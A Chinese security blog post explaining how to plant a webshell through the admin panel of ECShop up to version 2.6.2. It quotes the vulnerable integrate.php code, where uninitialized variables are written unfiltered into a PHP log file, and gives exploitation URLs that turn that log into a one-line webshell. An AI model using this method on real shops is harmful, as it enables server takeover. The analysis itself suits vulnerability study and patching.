ECShop网店系统<=V2.6.2 后台拿webshell

所属分类: 网络安全 / 漏洞分析 阅读数: 131
收藏 0 赞 0 分享
ECSHOP前段时间出了个注射漏洞:http://bbs.wolvez.org/topic/67/,拿后台权限应该没有问题,但文章没有提及如何在后台拿shell。昨天可乐在t00ls.Net上发帖问如何拿shell,无聊中我baidu、google了下,网上貌似没有拿shell的办法。好久没读代码了,无聊中下了ECSHOP最新版(V2.6.2)的源码过来读,很庆幸,给我找到一个可以直接写shell的文件。与注射一样,同样是个变化未初始化导致的问题,于是,同样只能用在register_globals为on的环境下。
integrate.php第740行起:

复制代码
代码如下:

if ($_REQUEST['act'] == 'sync')
{
$size = 100;
......
$tasks = array();
if ($task_del > 0)
{
$tasks[] = array('task_name'=>sprintf($_LANG['task_del'], $task_del),'task_status'=>'' . $_LANG['task_uncomplete'] . '');
$sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 2";
$del_list = $db->getCol($sql);//$del_list未初始化
}
if ($task_rename > 0)
{
$tasks[] = array('task_name'=>sprintf($_LANG['task_rename'], $task_rename),'task_status'=>'' . $_LANG['task_uncomplete'] . '');
$sql = "SELECT user_name, alias FROM " . $ecs->table('users') . " WHERE flag = 3";
$rename_list = $db->getAll($sql);//$rename_list未初始化
}
if ($task_ignore >0)
{
$sql = "SELECT user_name FROM " . $ecs->table('users') . " WHERE flag = 4";
$ignore_list = $db->getCol($sql);//$ignore_list未初始化
}
......
/* 保存修改日志 */
$fp = @fopen(ROOT_PATH . DATA_DIR . '/integrate_' . $_SESSION['code'] . '_log.php', 'wb');
$log = '';
if (isset($del_list))
{
$log .= '$del_list=' . var_export($del_list,true) . ';';
}
if (isset($rename_list))
{
$log .= '$rename_list=' . var_export($rename_list, true) . ';';
}
if (isset($ignore_list))
{
$log .= '$ignore_list=' . var_export($ignore_list, true) . ';';
}
//未做过滤,直接写log
fwrite($fp, $log);
fclose($fp);
$smarty->assign('tasks', $tasks);
$smarty->assign('ur_here',$_LANG['user_sync']);
$smarty->assign('size', $size);
$smarty->display('integrates_sync.htm');
}

$del_list、$rename_list、$ignore_list均没有初始化,于是,均可以直接写shell。
利用方法:
http://www.oldjun.com/admin/integrate.php?act=sync&del_list=
http://www.oldjun.com/admin/inte ... nc&rename_list=
http://www.oldjun.com/admin/inte ... nc&ignore_list=
三个链接,随便输入一个就可以了,生成http://www.oldjun.com/data/integrate__log.php,就是一句话小马了~
更多精彩内容其他人还在看

Uread阅读器拒绝服务漏洞的分析与解决

Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。
收藏 0 赞 0 分享

淇晨科技网站管理系統默认漏洞的分析

分析一下一个网站的漏洞
收藏 0 赞 0 分享

Kesion cms注入漏洞分析及其修复方案

Kesion cms注入漏洞.我们来分析一下
收藏 0 赞 0 分享

中关村在线博客子站SQL注入及修复方案

分析一下中关村的博客的漏洞
收藏 0 赞 0 分享

时时送订单系统后台登陆框post注入的方法介绍以及修复方案

通过post注入来研究一下漏洞
收藏 0 赞 0 分享

KindEditor上传解析漏洞、列目录、内容漏洞

KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器,但是安全问题也不容忽视,下面来简单分析下
收藏 0 赞 0 分享

服务器上网站被挂Iframe木马的解决方法

今天访问公司的一个网站,突然发现网页显示不对,右键查看HTML代码,发现iframe了一个网站的js文件,不用说,肯定被挂马了
收藏 0 赞 0 分享

WordPress 4.0以下版本存在跨站脚本漏洞

WordPress是著名的开源CMS(内容管理)系统。近日,在4.0版本以下的Wordpress被发现存在跨站脚本漏洞(XSS),新版本的Wordpress已经修复了这些问题。为了安全起见,建议站长们尽早更新到WP新版本。
收藏 0 赞 0 分享

历史悠久的3个经典网站安全漏洞介绍

这篇文章主要介绍了历史悠久的3个经典网站安全漏洞介绍,互联网项目里边,SQL注入漏洞、XSS漏洞和猜测URL攻击这三个漏洞可谓历史悠久,本文就一一介绍了它们的原理等,需要的朋友可以参考下
收藏 0 赞 0 分享

Kindeditor遍历目录0DAY问题

KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器
收藏 0 赞 0 分享
查看更多